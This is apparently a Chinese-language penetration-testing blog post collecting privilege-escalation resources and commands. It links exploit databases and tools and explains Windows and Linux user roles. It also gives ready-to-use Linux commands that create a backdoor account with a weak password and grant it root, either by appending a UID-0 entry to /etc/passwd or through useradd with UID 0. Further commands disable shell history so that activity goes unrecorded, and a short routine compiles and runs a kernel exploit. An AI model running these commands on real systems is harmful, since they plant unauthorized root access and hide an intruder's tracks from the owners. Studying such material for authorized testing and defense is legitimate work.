提权合集


提权合集

一、提权资源

Linux-kernel-exploits:https://github.com/SecWiki/linux-kernel-exploits
windows-kernel-exploits:https://github.com/SecWiki/windows-kernel-exploits
漏洞利用搜索引擎:https://sploitus.com/
Exploit Database:https://www.exploit-db.com/
Vulnerability & Exploit Database:https://www.rapid7.com/db/?type=metasploit
Har-sia:https://har-sia.info/index-en.html
GTFOBins:https://gtfobins.github.io/

二、提权命令合集

Linux

获取基本信息

# 查看系统发行版本
lsb_release -a

# 查看内核版本
uname -a

# 查找可以用来提权的SUID文件
find / -perm -u=s -type f 2>/dev/null

# 查看计划任务,找到有修改权限的计划任务脚本
ls -l /etc/cron*
more /etc/crontab

添加普通用户

# 创建一个用户名guest,密码123456的普通用户
useradd -p `openssl passwd -1 -salt 'salt' 123456` guest

# useradd -p 方法  ` ` 是用来存放可执行的系统命令,"$()"也可以存放命令执行语句
useradd -p "$(openssl passwd -1 123456)" guest

# chpasswd方法
useradd guest;echo 'guest:123456'|chpasswd

# echo -e方法
useradd test;echo -e "123456\n123456\n" |passwd test

然后把我们添加的用户赋予 root 权限

echo "guest:x:0:0::/:/bin/sh" >> /etc/passwd
echo 'guest:123456'|chpasswd

直接添加 root 用户

# 创建一个用户名guest,密码123456的root用户
useradd -p `openssl passwd -1 -salt 'salt' 123456` guest -o -u 0 -g root -G root -s /bin/bash -d /home/test

无痕终端操作

执行完成后当前终端所有操作不被记录

unset HISTORY HISTFILE HISTLOG HISTSAVES
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0

三、Exp 使用三部曲

gcc exp.c -o exp
chomd +x exp
./exp

四、linux 提权辅助工具

  1. les - 该工具主要帮助检测 linux 内核的安全缺陷

https://github.com/mzet-/linux-exploit-suggester

  1. LinEnum - 提权信息收集

https://github.com/rebootuser/LinEnum

五、Windows 下的权限划分

Windows 是一个支持多用户、多任务的操作系统,这是权限设置的基础,一切权限设置都是基于用户和进程而言的,不同的用户在访问这台计算机时,将会有不同的权限。
WindowsNT 用户组:

  • Administrators:管理员组,默认情况下,Administrators 中的用户对计算机/域有不受限制的完全访问权。
  • Power Users:高级用户组,Power Users 可以执行除了为 Administrators 组保留的任务外的其他任何操作系统任务。
  • Users:普通用户组,这个组的用户无法进行有意或无意的改动。
  • Guests:来宾组,来宾跟普通 Users 的成员有同等访问权,但来宾帐户的限制更多
  • Everyone:所有的用户,这个计算机上的所有用户都属于这个组。

六、Linux 下的权限划分

在 Linux 系统中,用户是分角色的,角色不同,对应权限不同。用户角色通过 UID 和 GID 识别。特别是 UID,一个 UID 是唯一标识一个系统用户的账号。

  • 超级用户(0):默认是 root 用户,其 UID 和 GID 都是 0。root 用户在每台 Unix 和 Linux 系统中都是唯一且真是存在的,通过它可以登陆系统,操作系统中任何文件执行系统中任何命令,拥有最高管理权限。
  • 普通用户(1~499/1~999):系统中大多数用户都是普通用户,实际中也一般使用普通用户操作,需要权限是用 sudo 命令提升权限。
  • 虚拟用户(500~65535/1000~65535):与真实的普通用户区分开来,这类用户最大特点是安装系统后默认就会存在,且默认情况大多数不能登陆系统,其在/etc/passwd 文件中,最后字段为/sbin/nologin。是系统正常运行不可缺少的,主要是方便系统管理,满足相应的系统进程对文件属主的要求

七、使用 python 快速开启 http 服务器

在当前目录开启 http 服务:

  1. 基于 python2.x
python2 -m SimpleHTTPServer 8000
  1. 基于 Python3.x
python3 -m http.server 8000

文章作者: Truda
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Truda !
评论
  目录